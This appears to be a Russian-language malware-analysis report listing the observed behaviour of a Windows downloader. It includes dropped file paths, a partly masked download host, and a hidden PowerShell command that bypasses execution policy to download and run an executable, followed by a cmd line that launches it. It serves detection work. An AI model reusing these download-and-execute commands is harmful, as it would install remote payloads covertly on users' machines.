Техническая информация
- http://19#.#2.66.100/gsfcjfh.exe как %appdata%\y8qom0xggqq.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Y8qOm0XGgQQ.exe
- %TEMP%\sbdtfhgygeghdpœ.sct
- %APPDATA%\y8qom0xggqq.exe
- %TEMP%\sbdtfhgygeghdpœ.sct
- '19#.#2.66.100':80
- http://19#.#2.66.100/Gsfcjfh.exe
- http://19#.#2.66.100/Gsfcjfh_Smdqjvrb.bmp
- '%APPDATA%\y8qom0xggqq.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#2.66.100/Gsfcjfh.exe','%APPDATA%\Y8qOm0XGgQQ.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Y8qOm0XGgQQ.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'